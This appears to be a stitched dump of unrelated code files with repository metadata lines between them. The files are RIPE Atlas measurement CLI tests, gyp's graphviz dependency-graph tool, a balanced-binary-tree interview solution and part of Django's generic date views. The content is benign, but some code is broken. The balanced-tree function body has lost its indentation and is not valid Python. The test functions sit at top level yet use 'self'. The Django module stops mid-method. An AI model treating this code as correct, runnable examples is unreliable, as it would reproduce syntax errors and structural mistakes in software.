def test_get_measurement_kwargs_sslcert(self):
    """_get_measurement_kwargs() for sslcert: spec defaults vs explicit
    --af/--description/--port overrides."""
    spec = Configuration.DEFAULT["specification"]["types"]["sslcert"]
    # Target only: everything else falls back to the configured defaults.
    cmd = SslcertMeasureCommand()
    cmd.init_args([
        "sslcert", "--target", "ripe.net"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "Sslcert measurement to ripe.net",
            "target": "ripe.net",
            "port": spec["port"]
        }
    )
    # Explicit overrides for all supported options.
    cmd = SslcertMeasureCommand()
    cmd.init_args([
        "sslcert",
        "--target", "ripe.net",
        "--af", "6",
        "--description", "This is my description",
        "--port", "7"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": 6,
            "description": "This is my description",
            "target": "ripe.net",
            "port": 7
        }
    )
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_http(self):
    """_get_measurement_kwargs() for HTTP: spec defaults vs a fully
    explicit command line (including --timing-verbosity mapping)."""
    spec = Configuration.DEFAULT["specification"]["types"]["http"]
    # Target only: defaults apply; note --body-bytes maps to the
    # "max_bytes_read" kwarg.
    cmd = HttpMeasureCommand()
    cmd.init_args([
        "http", "--target", "ripe.net"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "Http measurement to ripe.net",
            "target": "ripe.net",
            "header_bytes": spec["header-bytes"],
            "version": spec["version"],
            "method": spec["method"],
            "port": spec["port"],
            "path": spec["path"],
            "query_string": spec["query-string"],
            "user_agent": spec["user-agent"],
            "max_bytes_read": spec["body-bytes"],
        }
    )
    # All options explicit; --timing-verbosity 2 should set both
    # extended_timing and more_extended_timing.
    cmd = HttpMeasureCommand()
    cmd.init_args([
        "http",
        "--target", "ripe.net",
        "--af", "6",
        "--description", "This is my description",
        "--header-bytes", "100",
        "--version", "99",
        "--method", "a-method",
        "--port", "7",
        "--path", "/path/to/something",
        "--query-string", "x=7",
        "--user-agent", "This is my custom user agent",
        "--body-bytes", "200",
        "--timing-verbosity", "2"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": 6,
            "description": "This is my description",
            "target": "ripe.net",
            "header_bytes": 100,
            "version": "99",
            "method": "a-method",
            "port": 7,
            "path": "/path/to/something",
            "query_string": "x=7",
            "user_agent": "This is my custom user agent",
            "max_bytes_read": 200,
            "extended_timing": True,
            "more_extended_timing": True
        }
    )
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_ntp(self):
    """_get_measurement_kwargs() for NTP: spec defaults vs explicit
    --af/--description/--packets/--timeout overrides."""
    spec = Configuration.DEFAULT["specification"]["types"]["ntp"]
    # Target only: defaults apply.
    cmd = NtpMeasureCommand()
    cmd.init_args([
        "ntp", "--target", "ripe.net"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": Configuration.DEFAULT["specification"]["af"],
            "description": "Ntp measurement to ripe.net",
            "target": "ripe.net",
            "packets": spec["packets"],
            "timeout": spec["timeout"]
        }
    )
    # Explicit overrides for all supported options.
    cmd = NtpMeasureCommand()
    cmd.init_args([
        "ntp",
        "--target", "ripe.net",
        "--af", "6",
        "--description", "This is my description",
        "--packets", "6",
        "--timeout", "9000"
    ])
    self.assertEqual(
        cmd._get_measurement_kwargs(),
        {
            "af": 6,
            "description": "This is my description",
            "target": "ripe.net",
            "packets": 6,
            "timeout": 9000
        }
    )
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_source_kwargs(self):
    """_get_source_kwargs() for every measurement kind: spec defaults plus
    each probe-selection flavour (country, area, prefix, asn, explicit
    probe list, measurement) and tag include/exclude overrides."""
    spec = Configuration.DEFAULT["specification"]
    for kind, klass in self.KINDS.items():
        cmd = klass()
        args = [kind, "--target", "example.com"]
        if kind == "dns":
            # dns takes --query-argument instead of --target.
            args = ["dns", "--query-argument", "example.com"]
        cmd.init_args(list(args))
        # Default tags depend on the address family in use.
        tags = spec["tags"]["ipv{}".format(cmd._get_af())]
        includes = tags[kind]["include"] + tags["all"]["include"]
        excludes = tags[kind]["exclude"] + tags["all"]["exclude"]
        # No source options: everything from the spec defaults.
        self.assertEqual(cmd._get_source_kwargs(), {
            "requested": spec["source"]["requested"],
            "type": spec["source"]["type"],
            "value": spec["source"]["value"],
            "tags": {"include": includes, "exclude": excludes}
        })
        # --from-country: value is upper-cased.
        cmd = klass()
        cmd.init_args(args + [
            "--probes", "10",
            "--from-country", "ca"
        ])
        self.assertEqual(cmd._get_source_kwargs(), {
            "requested": 10,
            "type": "country",
            "value": "CA",
            "tags": {"include": includes, "exclude": excludes}
        })
        # --from-area: every supported area keyword.
        for area in ("WW", "West", "North-Central", "South-Central",
                     "North-East", "South-East"):
            cmd = klass()
            cmd.init_args(args + [
                "--probes", "10",
                "--from-area", area
            ])
            self.assertEqual(cmd._get_source_kwargs(), {
                "requested": 10,
                "type": "area",
                "value": area,
                "tags": {"include": includes, "exclude": excludes}
            })
        # --from-prefix.
        cmd = klass()
        cmd.init_args(args + [
            "--probes", "10",
            "--from-prefix", "1.2.3.0/22"
        ])
        self.assertEqual(cmd._get_source_kwargs(), {
            "requested": 10,
            "type": "prefix",
            "value": "1.2.3.0/22",
            "tags": {"include": includes, "exclude": excludes}
        })
        # --from-asn: value is coerced to int.
        cmd = klass()
        cmd.init_args(args + [
            "--probes", "10",
            "--from-asn", "3333"
        ])
        self.assertEqual(cmd._get_source_kwargs(), {
            "requested": 10,
            "type": "asn",
            "value": 3333,
            "tags": {"include": includes, "exclude": excludes}
        })
        # Try 20 permutations of probe lists
        for __ in range(0, 20):
            requested = randint(1, 500)
            selection = [str(randint(1, 5000)) for _ in range(0, 100)]
            cmd = klass()
            cmd.init_args(args + [
                "--probes", str(requested),
                "--from-probes", ",".join(selection)
            ])
            self.assertEqual(cmd._get_source_kwargs(), {
                "requested": requested,
                "type": "probes",
                "value": ",".join(selection),
                "tags": {"include": includes, "exclude": excludes}
            })
        # --from-measurement: source type is "msm", value coerced to int.
        cmd = klass()
        cmd.init_args(args + [
            "--probes", "10",
            "--from-measurement", "1001"
        ])
        self.assertEqual(cmd._get_source_kwargs(), {
            "requested": 10,
            "type": "msm",
            "value": 1001,
            "tags": {"include": includes, "exclude": excludes}
        })
        # Explicit tags replace the spec's default tag lists entirely.
        cmd = klass()
        cmd.init_args(args + [
            "--include-tag", "tag-to-include",
            "--exclude-tag", "tag-to-exclude"
        ])
        self.assertEqual(cmd._get_source_kwargs(), {
            "requested": spec["source"]["requested"],
            "type": spec["source"]["type"],
            "value": spec["source"]["value"],
            "tags": {
                "include": ["tag-to-include"],
                "exclude": ["tag-to-exclude"]
            }
        })
def test_get_af(self):
    """_get_af() honours an explicit --af, infers 4/6 from an IPv4/IPv6
    --target, and falls back to the configured default otherwise."""
    conf = copy.deepcopy(Configuration.DEFAULT)
    # Sentinel default so the fallback path is unambiguous.
    conf["specification"]["af"] = 100
    for kind, klass in self.KINDS.items():
        with mock.patch(self.CONF, conf):
            # Explicit --af always wins.
            for af in (4, 6):
                cmd = klass()
                cmd.init_args([kind, "--af", str(af)])
                self.assertEqual(cmd._get_af(), af)
            # Inferred from an IPv4 literal target.
            cmd = klass()
            cmd.init_args([kind, "--target", "1.2.3.4"])
            self.assertEqual(cmd._get_af(), 4)
            # Inferred from an IPv6 literal target.
            cmd = klass()
            cmd.init_args([kind, "--target", "1:2:3:4:5:6:7:8"])
            self.assertEqual(cmd._get_af(), 6)
            # Not a valid IP literal: fall back to the configured default.
            cmd = klass()
            cmd.init_args([kind, "--target", "1.2.3.4.5"])
            self.assertEqual(
                cmd._get_af(),
                conf["specification"]["af"]
            )
def test_handle_api_error(self):
    """_handle_api_error() wraps both plain-string and {"detail": ...}
    error payloads in a RipeAtlasToolsException with a standard message."""
    cmd = Command()
    message = (
        "There was a problem communicating with the RIPE Atlas "
        "infrastructure. The message given was:\n\n  {}"
    )
    # Plain-text error payload.
    with self.assertRaises(RipeAtlasToolsException) as e:
        cmd._handle_api_error("This is a plain text error")
    self.assertEqual(
        str(e.exception),
        message.format("This is a plain text error")
    )
    # Structured payload: the "detail" value is extracted.
    with self.assertRaises(RipeAtlasToolsException) as e:
        cmd._handle_api_error({"detail": "This is a formatted error"})
    self.assertEqual(
        str(e.exception),
        message.format("This is a formatted error")
    )
def test_add_arguments(self):
    """Argument validation: every rejected value must exit with a
    specific argparse error message on stderr."""
    # Unknown renderer.
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(SystemExit):
            PingMeasureCommand().init_args([
                "ping",
                "--renderer", "not-a-renderer"
            ])
        self.assertTrue(stderr.getvalue().split("\n")[-2].startswith(
            "ripe-atlas measure: error: argument --renderer: invalid "
            "choice: 'not-a-renderer' (choose from"
        ))
    # --af only accepts 4 or 6.
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(SystemExit):
            PingMeasureCommand().init_args(["ping", "--af", "5"])
        self.assertEqual(
            stderr.getvalue().split("\n")[-2],
            "ripe-atlas measure: error: argument --af: invalid choice: 5 "
            "(choose from 4, 6)"
        )
    # --target must look like an IP address or host name.
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(SystemExit):
            PingMeasureCommand().init_args([
                "ping",
                "--target", "not a target"
            ])
        self.assertEqual(
            stderr.getvalue().split("\n")[-2],
            "ripe-atlas measure: error: argument --target: "
            "\"not a target\" does not appear to be an IP address or host "
            "name"
        )
    # --from-area is a closed choice list.
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(SystemExit):
            PingMeasureCommand().init_args(["ping", "--from-area", "not an area"])
        self.assertTrue(stderr.getvalue().split("\n")[-2].startswith(
            "ripe-atlas measure: error: argument --from-area: invalid "
            "choice:"))
    # Probe ids in --from-probes must be >= 1.
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(SystemExit):
            PingMeasureCommand().init_args(["ping", "--from-probes", "0,50000"])
        self.assertEqual(
            stderr.getvalue().split("\n")[-2],
            "ripe-atlas measure: error: argument --from-probes: 0 "
            "is lower than the minimum permitted value of 1."
        )
    # Invalid tag spellings for both --include-tag and --exclude-tag.
    for clude in ("in", "ex"):
        with capture_sys_output() as (stdout, stderr):
            for tag in ("NotATag", "tag!", "not a tag", "νοτ α ταγ"):
                with self.assertRaises(SystemExit):
                    PingMeasureCommand().init_args([
                        "ping",
                        "--{}clude-tag".format(clude), tag
                    ])
                self.assertEqual(
                    stderr.getvalue().split("\n")[-2],
                    'ripe-atlas measure: error: argument --{}clude-tag: '
                    '"{}" does not appear to be a valid tag.'.format(clude, tag)
                )
    # Protocol choices differ per measurement type (note: input is
    # upper-cased before validation, hence 'INVALID' in the message).
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(SystemExit):
            TracerouteMeasureCommand().init_args(["traceroute", "--protocol", "invalid"])
        self.assertEqual(
            stderr.getvalue().split("\n")[-2],
            "ripe-atlas measure: error: argument --protocol: invalid "
            "choice: 'INVALID' (choose from 'ICMP', 'UDP', 'TCP')"
        )
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(SystemExit):
            DnsMeasureCommand().init_args(["dns", "--protocol", "invalid"])
        self.assertEqual(
            stderr.getvalue().split("\n")[-2],
            "ripe-atlas measure: error: argument --protocol: invalid "
            "choice: 'INVALID' (choose from 'UDP', 'TCP')"
        )
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(SystemExit):
            HttpMeasureCommand().init_args(
                ["http", "--timing-verbosity", "3"])
        self.assertEqual(
            stderr.getvalue().split("\n")[-2],
            "ripe-atlas measure: error: argument --timing-verbosity: "
            "invalid choice: 3 (choose from 0, 1, 2)"
        )
    # Options with a lower bound only: value below the minimum must fail.
    min_options = {
        "from-measurement": ((PingMeasureCommand,), 1),
        "probes": ((PingMeasureCommand,), 1),
        "packets": (
            (
                PingMeasureCommand,
                TracerouteMeasureCommand,
                NtpMeasureCommand
            ),
            1
        ),
        "size": ((PingMeasureCommand, TracerouteMeasureCommand), 1),
        "packet-interval": ((PingMeasureCommand,), 1),
        "timeout": ((TracerouteMeasureCommand, NtpMeasureCommand,), 1),
        "destination-option-size": ((TracerouteMeasureCommand,), 1),
        "hop-by-hop-option-size": ((TracerouteMeasureCommand,), 1),
        "retry": ((DnsMeasureCommand,), 1),
        "udp-payload-size": ((DnsMeasureCommand,), 1),
    }
    for option, (klasses, minimum) in min_options.items():
        for klass in klasses:
            with capture_sys_output() as (stdout, stderr):
                test_value = minimum - 1
                with self.assertRaises(SystemExit):
                    klass().init_args([
                        klass.__name__.replace("MeasureCommand", "").lower(),
                        "--{}".format(option), str(test_value)
                    ])
                self.assertEqual(
                    stderr.getvalue().split("\n")[-2],
                    "ripe-atlas measure: error: argument --{}: "
                    "The integer must be greater than {}.".format(
                        option,
                        minimum
                    )
                )
    # Options with both bounds: the dict stores (min - 1, max + 1), i.e.
    # the first out-of-range value on each side.
    min_max_options = {
        "from-asn": (
            (PingMeasureCommand,),
            (0, 2 ** 32 - 2 + 1)
        ),
        "paris": (
            (TracerouteMeasureCommand,),
            (-1, 65)
        ),
        "first-hop": (
            (TracerouteMeasureCommand,),
            (0, 256)
        ),
        "max-hops": (
            (TracerouteMeasureCommand,),
            (0, 256)
        ),
        "port": (
            (
                TracerouteMeasureCommand,
                SslcertMeasureCommand,
                HttpMeasureCommand
            ),
            (0, 2 ** 16 + 1)
        ),
        "header-bytes": ((HttpMeasureCommand,), (-1, 2049)),
        "body-bytes": ((HttpMeasureCommand,), (0, 1020049)),
    }
    for option, (klasses, extremes) in min_max_options.items():
        for klass in klasses:
            for val in extremes:
                with capture_sys_output() as (stdout, stderr):
                    with self.assertRaises(SystemExit):
                        klass().init_args([
                            klass.__name__.replace("MeasureCommand", "").lower(),
                            "--{}".format(option), str(val)
                        ])
                    self.assertEqual(
                        stderr.getvalue().split("\n")[-2],
                        "ripe-atlas measure: error: argument --{}: The "
                        "integer must be between {} and {}.".format(
                            option, extremes[0] + 1, extremes[1] - 1
                        )
                    )
@mock.patch(CONF, Configuration.DEFAULT)
def test_account_for_selected_probes(self):
    """_account_for_selected_probes() fills arguments.probes from the
    spec default, honours an explicit --probes, infers the count from
    --from-probes, and rejects contradictory --probes/--from-probes."""
    spec = Configuration.DEFAULT["specification"]
    # No probe options: fall back to the configured default.
    # (Fix: the original calls had stray trailing commas, turning each
    # bare call into a pointless 1-tuple expression statement.)
    cmd = PingMeasureCommand()
    cmd.init_args(["ping", "--target", "ripe.net"])
    cmd._account_for_selected_probes()
    self.assertEqual(cmd.arguments.probes, spec["source"]["requested"])
    # Explicit --probes wins.
    cmd = PingMeasureCommand()
    cmd.init_args(["ping", "--target", "ripe.net", "--probes", "7"])
    cmd._account_for_selected_probes()
    self.assertEqual(cmd.arguments.probes, 7)
    # --from-probes implies the probe count.
    cmd = PingMeasureCommand()
    cmd.init_args(["ping", "--target", "ripe.net", "--from-probes", "1,2"])
    cmd._account_for_selected_probes()
    self.assertEqual(cmd.arguments.probes, 2)
    # Conflicting --from-probes and --probes must raise.
    cmd = PingMeasureCommand()
    cmd.init_args([
        "ping",
        "--target", "ripe.net",
        "--from-probes", "1,2",
        "--probes", "7"
    ])
    with capture_sys_output() as (stdout, stderr):
        with self.assertRaises(RipeAtlasToolsException):
            cmd._account_for_selected_probes()
|
gpl-3.0
|
Prash88/my-wedding
|
node_modules/node-gyp/gyp/tools/graphviz.py
|
2679
|
2878
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Using the JSON dumped by the dump-dependency-json generator,
generate input suitable for graphviz to render a dependency graph of
targets."""
import collections
import json
import sys
def ParseTarget(target):
    """Split a gyp target string into (build_file, target_name, toolset).

    A fully-qualified target looks like "path/to/file.gyp:name#toolset";
    any missing piece comes back as an empty string.
    """
    rest, _, toolset = target.partition('#')
    build_file, _, name = rest.partition(':')
    return build_file, name, toolset
def LoadEdges(filename, targets):
    """Load the edges map from the JSON dump file |filename|, filtered to
    |targets| and everything they transitively depend on.

    Returns a dict mapping each reachable target to its dependency list.
    """
    # BUG FIX: the original ignored the |filename| parameter and always
    # opened 'dump.json'; it also leaked the file handle and shadowed the
    # builtin name `file`.
    with open(filename) as f:
        edges = json.load(f)
    # Walk the graph from the requested roots, copying out only the
    # reachable edges from the full edge list.
    target_edges = {}
    to_visit = list(targets)
    while to_visit:
        src = to_visit.pop()
        if src in target_edges:
            continue
        target_edges[src] = edges[src]
        to_visit.extend(edges[src])
    return target_edges
def WriteGraph(edges):
    """Print a graphviz (dot) graph to stdout.

    |edges| is a map of target to a list of other targets it depends on.
    Targets from the same build file are grouped into a subgraph cluster.
    """
    # Modernised: print statements converted to single-argument print()
    # calls, which parse identically under Python 2 and Python 3.
    # Bucket targets by file.
    files = collections.defaultdict(list)
    for src in edges:  # was `for src, dst in edges.items()` with dst unused
        build_file, target_name, toolset = ParseTarget(src)
        files[build_file].append(src)
    print('digraph D {')
    print(' fontsize=8')  # Used by subgraphs.
    print(' node [fontsize=8]')
    # Output nodes by file. We must first write out each node within
    # its file grouping before writing out any edges that may refer
    # to those nodes.
    for filename, targets in files.items():
        if len(targets) == 1:
            # If there's only one node for this file, simplify
            # the display by making it a box without an internal node.
            target = targets[0]
            build_file, target_name, toolset = ParseTarget(target)
            print(' "%s" [shape=box, label="%s\\n%s"]' % (target, filename,
                                                          target_name))
        else:
            # Group multiple nodes together in a subgraph.
            print(' subgraph "cluster_%s" {' % filename)
            print(' label = "%s"' % filename)
            for target in targets:
                build_file, target_name, toolset = ParseTarget(target)
                print(' "%s" [label="%s"]' % (target, target_name))
            print(' }')
    # Now that we've placed all the nodes within subgraphs, output all
    # the edges between nodes.
    for src, dsts in edges.items():
        for dst in dsts:
            print(' "%s" -> "%s"' % (src, dst))
    print('}')
def main():
    """Entry point: read target names from argv, load 'dump.json', and
    emit a graphviz graph for them.  Returns a process exit status."""
    if len(sys.argv) < 2:
        # Python-2/3-compatible replacement for `print >>sys.stderr, ...`.
        sys.stderr.write(__doc__ + '\n')
        sys.stderr.write('\n')
        sys.stderr.write('usage: %s target1 target2...\n' % (sys.argv[0]))
        return 1
    edges = LoadEdges('dump.json', sys.argv[1:])
    WriteGraph(edges)
    return 0


if __name__ == '__main__':
    sys.exit(main())
|
mit
|
Liuqian0501/elements-of-programming-interview
|
09-binary-tree/9-1-Test if a binary tree is height-balanced/python/balanced_binary_tree.py
|
2
|
1774
|
from binary_tree_prototype import BinaryTreeNode
import collections
# @include
def is_balanced_binary_tree(tree):
BalancedStatusWithHeight = collections.namedtuple(
'BalancedStatusWithHeight', ('balanced', 'height'))
# First value of the return value indicates if tree is balanced, and if
# balanced the second value of the return value is the height of tree.
def check_balanced(tree):
if not tree:
return BalancedStatusWithHeight(True, -1) # Base case.
left_result = check_balanced(tree.left)
if not left_result.balanced:
# Left subtree is not balanced.
return BalancedStatusWithHeight(False, 0)
right_result = check_balanced(tree.right)
if not right_result.balanced:
# Right subtree is not balanced.
return BalancedStatusWithHeight(False, 0)
is_balanced = abs(left_result.height - right_result.height) <= 1
height = max(left_result.height, right_result.height) + 1
return BalancedStatusWithHeight(is_balanced, height)
return check_balanced(tree).balanced
# @exclude
def main():
    """Exercise is_balanced_binary_tree on one balanced and one skewed tree."""
    # Balanced tree:
    #      3
    #    2   5
    #   1   4 6
    root = BinaryTreeNode()
    root.left = BinaryTreeNode()
    root.left.left = BinaryTreeNode()
    root.right = BinaryTreeNode()
    root.right.left = BinaryTreeNode()
    root.right.right = BinaryTreeNode()
    assert is_balanced_binary_tree(root)
    print(is_balanced_binary_tree(root))
    # Left-skewed (unbalanced) tree: root -> left -> left.left.
    root = BinaryTreeNode()
    root.left = BinaryTreeNode()
    root.left.left = BinaryTreeNode()
    assert not is_balanced_binary_tree(root)
    print(is_balanced_binary_tree(root))


if __name__ == '__main__':
    main()
|
mit
|
tomchristie/django
|
django/views/generic/dates.py
|
4
|
25236
|
import datetime
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.http import Http404
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.translation import gettext as _
from django.views.generic.base import View
from django.views.generic.detail import (
BaseDetailView, SingleObjectTemplateResponseMixin,
)
from django.views.generic.list import (
MultipleObjectMixin, MultipleObjectTemplateResponseMixin,
)
class YearMixin:
    """Mixin providing year handling for date-based views."""
    year_format = '%Y'
    year = None

    def get_year_format(self):
        """Return the strptime format used to parse the year from the URL."""
        return self.year_format

    def get_year(self):
        """Return the year this view should display data for."""
        value = self.year
        if value is not None:
            return value
        try:
            return self.kwargs['year']
        except KeyError:
            pass
        try:
            return self.request.GET['year']
        except KeyError:
            raise Http404(_("No year specified"))

    def get_next_year(self, date):
        """Get the next valid year."""
        return _get_next_prev(self, date, is_previous=False, period='year')

    def get_previous_year(self, date):
        """Get the previous valid year."""
        return _get_next_prev(self, date, is_previous=True, period='year')

    def _get_next_year(self, date):
        """
        Return the start date of the next year-long interval.

        Intervals satisfy: start date <= item date < next start date.
        """
        try:
            return date.replace(year=date.year + 1, month=1, day=1)
        except ValueError:
            # year + 1 overflowed the supported date range.
            raise Http404(_("Date out of range"))

    def _get_current_year(self, date):
        """Return January 1st of *date*'s year."""
        return date.replace(month=1, day=1)
class MonthMixin:
    """Mixin providing month handling for date-based views."""
    month_format = '%b'
    month = None

    def get_month_format(self):
        """Return the strptime format used to parse the month from the URL."""
        return self.month_format

    def get_month(self):
        """Return the month this view should display data for."""
        value = self.month
        if value is not None:
            return value
        try:
            return self.kwargs['month']
        except KeyError:
            pass
        try:
            return self.request.GET['month']
        except KeyError:
            raise Http404(_("No month specified"))

    def get_next_month(self, date):
        """Get the next valid month."""
        return _get_next_prev(self, date, is_previous=False, period='month')

    def get_previous_month(self, date):
        """Get the previous valid month."""
        return _get_next_prev(self, date, is_previous=True, period='month')

    def _get_next_month(self, date):
        """
        Return the start date of the next month-long interval.

        Intervals satisfy: start date <= item date < next start date.
        """
        if date.month == 12:
            # December rolls over to January of the next year, which can
            # push the date past the supported range.
            try:
                return date.replace(year=date.year + 1, month=1, day=1)
            except ValueError:
                raise Http404(_("Date out of range"))
        return date.replace(month=date.month + 1, day=1)

    def _get_current_month(self, date):
        """Return the first day of *date*'s month."""
        return date.replace(day=1)
class DayMixin:
    """Mixin providing day handling for date-based views."""
    day_format = '%d'
    day = None

    def get_day_format(self):
        """Return the strptime format used to parse the day from the URL."""
        return self.day_format

    def get_day(self):
        """Return the day this view should display data for."""
        value = self.day
        if value is not None:
            return value
        try:
            return self.kwargs['day']
        except KeyError:
            pass
        try:
            return self.request.GET['day']
        except KeyError:
            raise Http404(_("No day specified"))

    def get_next_day(self, date):
        """Get the next valid day."""
        return _get_next_prev(self, date, is_previous=False, period='day')

    def get_previous_day(self, date):
        """Get the previous valid day."""
        return _get_next_prev(self, date, is_previous=True, period='day')

    def _get_next_day(self, date):
        """
        Return the start date of the next one-day interval.

        Intervals satisfy: start date <= item date < next start date.
        """
        return date + datetime.timedelta(days=1)

    def _get_current_day(self, date):
        """Return the start date of the current interval (the day itself)."""
        return date
class WeekMixin:
    """Mixin providing week handling for date-based views."""
    week_format = '%U'
    week = None

    def get_week_format(self):
        """Return the strptime format used to parse the week from the URL."""
        return self.week_format

    def get_week(self):
        """Return the week this view should display data for."""
        value = self.week
        if value is not None:
            return value
        try:
            return self.kwargs['week']
        except KeyError:
            pass
        try:
            return self.request.GET['week']
        except KeyError:
            raise Http404(_("No week specified"))

    def get_next_week(self, date):
        """Get the next valid week."""
        return _get_next_prev(self, date, is_previous=False, period='week')

    def get_previous_week(self, date):
        """Get the previous valid week."""
        return _get_next_prev(self, date, is_previous=True, period='week')

    def _get_next_week(self, date):
        """
        Return the start date of the next week-long interval.

        Intervals satisfy: start date <= item date < next start date.
        """
        try:
            return date + datetime.timedelta(days=7 - self._get_weekday(date))
        except OverflowError:
            # Advancing past date.max.
            raise Http404(_("Date out of range"))

    def _get_current_week(self, date):
        """Return the first day of *date*'s week."""
        return date - datetime.timedelta(self._get_weekday(date))

    def _get_weekday(self, date):
        """
        Return the weekday of *date* under the view's week format:
        0 is the first day of the week and 6 the last.
        """
        week_format = self.get_week_format()
        if week_format == '%W':  # week starts on Monday
            return date.weekday()
        if week_format == '%U':  # week starts on Sunday
            return (date.weekday() + 1) % 7
        raise ValueError("unknown week format: %s" % week_format)
class DateMixin:
    """Mixin class for views manipulating date-based data."""
    # Name of the model field used for date filtering; must be set by the
    # concrete view (see get_date_field()).
    date_field = None
    # Whether objects dated in the future may be displayed.
    allow_future = False

    def get_date_field(self):
        """Get the name of the date field to be used to filter by."""
        if self.date_field is None:
            raise ImproperlyConfigured("%s.date_field is required." % self.__class__.__name__)
        return self.date_field

    def get_allow_future(self):
        """
        Return `True` if the view should be allowed to display objects from
        the future.
        """
        return self.allow_future

    # Note: the following three methods only work in subclasses that also
    # inherit SingleObjectMixin or MultipleObjectMixin.

    @cached_property
    def uses_datetime_field(self):
        """
        Return `True` if the date field is a `DateTimeField` and `False`
        if it's a `DateField`.
        """
        model = self.get_queryset().model if self.model is None else self.model
        field = model._meta.get_field(self.get_date_field())
        return isinstance(field, models.DateTimeField)

    def _make_date_lookup_arg(self, value):
        """
        Convert a date into a datetime when the date field is a DateTimeField.

        When time zone support is enabled, `date` is assumed to be in the
        current time zone, so that displayed items are consistent with the URL.
        """
        if self.uses_datetime_field:
            # Midnight at the start of the day, made aware (when USE_TZ)
            # so the boundary matches the current time zone.
            value = datetime.datetime.combine(value, datetime.time.min)
            if settings.USE_TZ:
                value = timezone.make_aware(value, timezone.get_current_timezone())
        return value

    def _make_single_date_lookup(self, date):
        """
        Get the lookup kwargs for filtering on a single date.

        If the date field is a DateTimeField, we can't just filter on
        date_field=date because that doesn't take the time into account.
        """
        date_field = self.get_date_field()
        if self.uses_datetime_field:
            # Half-open interval: [start of day, start of next day).
            since = self._make_date_lookup_arg(date)
            until = self._make_date_lookup_arg(date + datetime.timedelta(days=1))
            return {
                '%s__gte' % date_field: since,
                '%s__lt' % date_field: until,
            }
        else:
            # Skip self._make_date_lookup_arg, it's a no-op in this branch.
            return {date_field: date}
class BaseDateListView(MultipleObjectMixin, DateMixin, View):
    """Abstract base class for date-based views displaying a list of objects."""
    allow_empty = False
    # Granularity of the navigation date list ('year', 'month' or 'day').
    date_list_period = 'year'

    def get(self, request, *args, **kwargs):
        """Build the context from get_dated_items() and render it."""
        self.date_list, self.object_list, extra_context = self.get_dated_items()
        context = self.get_context_data(
            object_list=self.object_list,
            date_list=self.date_list,
            **extra_context
        )
        return self.render_to_response(context)

    def get_dated_items(self):
        """Obtain the list of dates and items."""
        raise NotImplementedError('A DateView must provide an implementation of get_dated_items()')

    def get_ordering(self):
        """
        Return the field or fields to use for ordering the queryset; use the
        date field by default.
        """
        return '-%s' % self.get_date_field() if self.ordering is None else self.ordering

    def get_dated_queryset(self, **lookup):
        """
        Get a queryset properly filtered according to `allow_future` and any
        extra lookup kwargs.
        """
        qs = self.get_queryset().filter(**lookup)
        date_field = self.get_date_field()
        allow_future = self.get_allow_future()
        allow_empty = self.get_allow_empty()
        paginate_by = self.get_paginate_by(qs)
        if not allow_future:
            # Compare against now() for datetime fields, today otherwise.
            now = timezone.now() if self.uses_datetime_field else timezone_today()
            qs = qs.filter(**{'%s__lte' % date_field: now})
        if not allow_empty:
            # When pagination is enabled, it's better to do a cheap query
            # than to load the unpaginated queryset in memory.
            is_empty = len(qs) == 0 if paginate_by is None else not qs.exists()
            if is_empty:
                raise Http404(_("No %(verbose_name_plural)s available") % {
                    'verbose_name_plural': qs.model._meta.verbose_name_plural,
                })
        return qs

    def get_date_list_period(self):
        """
        Get the aggregation period for the list of dates: 'year', 'month', or
        'day'.
        """
        return self.date_list_period

    def get_date_list(self, queryset, date_type=None, ordering='ASC'):
        """
        Get a date list by calling `queryset.dates/datetimes()`, checking
        along the way for empty lists that aren't allowed.
        """
        date_field = self.get_date_field()
        allow_empty = self.get_allow_empty()
        if date_type is None:
            date_type = self.get_date_list_period()
        if self.uses_datetime_field:
            date_list = queryset.datetimes(date_field, date_type, ordering)
        else:
            date_list = queryset.dates(date_field, date_type, ordering)
        if date_list is not None and not date_list and not allow_empty:
            raise Http404(
                _("No %(verbose_name_plural)s available") % {
                    'verbose_name_plural': queryset.model._meta.verbose_name_plural,
                }
            )
        return date_list
class BaseArchiveIndexView(BaseDateListView):
    """
    Base class for archives of date-based items. Requires a response mixin.
    """
    context_object_name = 'latest'

    def get_dated_items(self):
        """Return (date_list, items, extra_context) for this request."""
        queryset = self.get_dated_queryset()
        dates = self.get_date_list(queryset, ordering='DESC')
        # No dates means no items; expose an empty queryset so templates
        # still receive a valid object list.
        items = queryset if dates else queryset.none()
        return (dates, items, {})
class ArchiveIndexView(MultipleObjectTemplateResponseMixin, BaseArchiveIndexView):
    """Top-level archive of date-based items."""
    # Selects the "<model>_archive" template by default.
    template_name_suffix = '_archive'
class BaseYearArchiveView(YearMixin, BaseDateListView):
    """List of objects published in a given year."""
    # Navigation dates are aggregated by month within the year.
    date_list_period = 'month'
    # By default only the date list is populated, not the full object list.
    make_object_list = False

    def get_dated_items(self):
        """Return (date_list, items, extra_context) for this request."""
        year = self.get_year()
        date_field = self.get_date_field()
        date = _date_from_string(year, self.get_year_format())
        # Half-open interval covering the whole year.
        since = self._make_date_lookup_arg(date)
        until = self._make_date_lookup_arg(self._get_next_year(date))
        lookup_kwargs = {
            '%s__gte' % date_field: since,
            '%s__lt' % date_field: until,
        }
        qs = self.get_dated_queryset(**lookup_kwargs)
